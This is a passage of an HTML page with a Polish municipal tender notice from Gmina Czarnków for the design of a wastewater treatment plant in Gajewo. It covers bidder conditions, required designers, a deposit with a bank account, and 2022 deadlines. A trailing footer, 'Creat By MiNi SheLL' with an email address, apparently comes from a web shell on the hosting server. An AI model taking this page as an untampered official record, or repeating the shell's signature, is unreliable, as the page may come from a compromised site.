class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunek/warunki udziału w<br/>postępowaniu dotyczący/-e:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa dodatkowych wymagań.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa dodatkowych wymagań.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>15<br/>Zamawiający nie określa dodatkowych wymagań.<br/>4) zdolności technicznej lub zawodowej:<br/>a) w okresie ostatnich trzech lat, przed dniem składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonanie minimum 1<br/>dokumentacji projektowej o wartości nie niższej niż 100 000zł brutto, dotyczącej<br/>budowy oczyszczalni ścieków o przepustowości min. 300 m3/d; co potwierdzi w<br/>wykazie wykonanych usług, ich wartości, daty, miejsca wykonania i podmiotów, na<br/>rzecz których usługi te zostały wykonane, z załączeniem dowodów potwierdzających, że<br/>zostały one wykonane należycie, przy czym dokumentami potwierdzającymi, o których<br/>mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Spełnianie warunku wykonawca potwierdzi poprzez złożenie wykazu usług wg<br/>załącznika nr 4 do SWZ. Zamawiający dokona oceny na zasadzie spełnia/nie spełnia.<br/>b) dysponuje osobami zdolnymi do wykonywania zamówienia:<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności sanitarnej, który posiada wykształcenie minimum średnie,<br/>staż pracy min. 3 letni i wykonał minimum 1 projekt budowy/przebudowy oczyszczalni<br/>ścieków o przepustowości min. 500 m3/d<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności elektrycznej, który posiada wykształcenie minimum<br/>średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności architektonicznej, który posiada wykształcenie minimum<br/>średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności konstrukcyjno-budowlanej, który posiada wykształcenie<br/>minimum średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności drogowej, który posiada wykształcenie minimum średnie,<br/>staż pracy min. 3 letni<br/>legitymującymi się uprawnieniami wydawanymi na podstawie Rozporządzenia Ministra<br/>Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego<br/>do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. 2019 poz.<br/>831) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie<br/>wcześniej obowiązujących przepisów, lub odpowiadające im uprawnienia budowlane,<br/>które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz<br/>Konfederacji szwajcarskiej w szczególności na podstawie przepisów:<br/>- ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r. poz. 220, z<br/>2021 r. poz. 78);<br/>- ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa (t.j. Dz. U. z 2019 r. poz. 1117.),<br/>16<br/>- ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa, dotyczące świadczenia usług transgranicznych;<br/>z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (t.j. Dz. U. z<br/>2020 r. poz. 1333 ze zm.), wraz z informacjami na temat ich uprawnień, doświadczenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Spełnianie warunku wykonawca potwierdzi poprzez złożenie wykazu osób zdolnych do<br/>wykonania zamówienia wg załącznika nr 5 do SWZ. Zamawiający dokona oceny na<br/>zasadzie spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych w okresie ostatnich trzech lat, przed dniem składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonanie minimum 1<br/>dokumentacji projektowej o wartości nie niższej niż 100 000zł brutto, dotyczącej<br/>budowy oczyszczalni ścieków o przepustowości min. 300 m3/d; co potwierdzi w<br/>wykazie wykonanych usług, ich wartości, daty, miejsca wykonania i podmiotów, na<br/>rzecz których usługi te zostały wykonane, z załączeniem dowodów potwierdzających, że<br/>zostały one wykonane należycie, przy czym dokumentami potwierdzającymi, o których<br/>mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Spełnianie warunku wykonawca potwierdzi poprzez złożenie wykazu usług wg<br/>załącznika nr 4 do SWZ. Zamawiający dokona oceny na zasadzie spełnia/nie spełnia.<br/>Wykaz osób zdolnych do wykonywania zamówienia:<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności sanitarnej, który posiada wykształcenie minimum średnie,<br/>staż pracy min. 3 letni i wykonał minimum 1 projekt budowy/przebudowy oczyszczalni<br/>ścieków o przepustowości min. 500 m3/d<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności elektrycznej, który posiada wykształcenie minimum<br/>średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności architektonicznej, który posiada wykształcenie minimum<br/>średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności konstrukcyjno-budowlanej, który posiada wykształcenie<br/>minimum średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności drogowej, który posiada wykształcenie minimum średnie,<br/>staż pracy min. 3 letni</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem<br/>terminu składania ofert, wnieść wadium w kwocie: 5 000zł (słownie: pięćtysięcy<br/>złotych).<br/>2) Wadium musi obejmować pełen okres związania ofertą tj. do dnia 18 maja 2022r.<br/>3) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7<br/>ustawy Pzp. a mianowicie:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>24<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w Banku<br/>Spółdzielczym w Czarnkowie, Nr rachunku: 75 8951 0009 0000 0954 2000 0150 podając w<br/>tytule przelewu: Wadium - Wykonanie kompletnej dokumentacji projektowej dla<br/>zadania pn.: &#34;Budowa oczyszczalni ścieków w Gajewie – dokumentacja techniczna”<br/>wraz z uzyskaniem pozwolenia na budowę oraz pełnieniem nadzoru autorskiego.<br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej<br/>przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy<br/>Zamawiającego).<br/>4) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty<br/>w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym<br/>podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać<br/>następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego),<br/>gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym<br/>w gwarancji lub poręczeniu musi być Gmina Czarnków, ul. Rybaki 3,<br/>64-700 Czarnków<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia<br/>bezwarunkowo, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach<br/>określonych w art. 98 ust. 6 ustawy Pzp.<br/>5) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób<br/>nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu<br/>związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa<br/>w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226<br/>ust. 1 pkt 14 ustawy Pzp.<br/>6) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5<br/>ustawy Pzp.<br/>7) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6<br/>ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Załącznik nr 9 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-22 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_czarnkow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-22 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com